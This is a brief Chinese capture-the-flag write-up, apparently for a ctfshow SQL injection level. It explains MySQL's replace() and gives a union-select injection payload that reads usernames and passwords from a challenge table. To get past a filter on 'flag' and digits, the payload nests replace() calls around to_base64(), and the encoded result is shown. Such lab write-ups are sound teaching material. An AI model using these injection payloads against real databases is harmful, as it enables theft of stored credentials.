replace(original-string,search-string,replace-string)
- original-string: 被搜索的字符串。可为任意长度。
- search-string: 要搜索并被 replace-string 替换的字符串。该字符串的长度不应超过 255 个字节。如果 search-string 是空字符串,则按原样返回原始字符串。
- replace-string: 该字符串用于替换 search-string。可为任意长度。如果 replace-string 是空字符串,则删除出现的所有 search-string。
过滤了flag和数字,则考虑将数字替换为其他值
初始:
1' union select username,password from ctfshow_user4 where username='flag' --
将username替换为
replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(username),'0','nmA'),'1','nmB'),'2','nmC'),'3','nmD'),'4','nmE'),'5','nmF'),'6','nmG'),'7','nmH'),'8','nmI'),'9','nmJ')
将password替换为
replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),'0','nmA'),'1','nmB'),'2','nmC'),'3','nmD'),'4','nmE'),'5','nmF'),'6','nmG'),'7','nmH'),'8','nmI'),'9','nmJ')
得到结果
YnmDRmcnmChvdnmDsxNzQwNjJjMynmBiYWQnmELTRkYnmCItYWQnmBYSnmAnmBZjkxODNiYWIyYTdnmJ
以此替换回去即可得到结果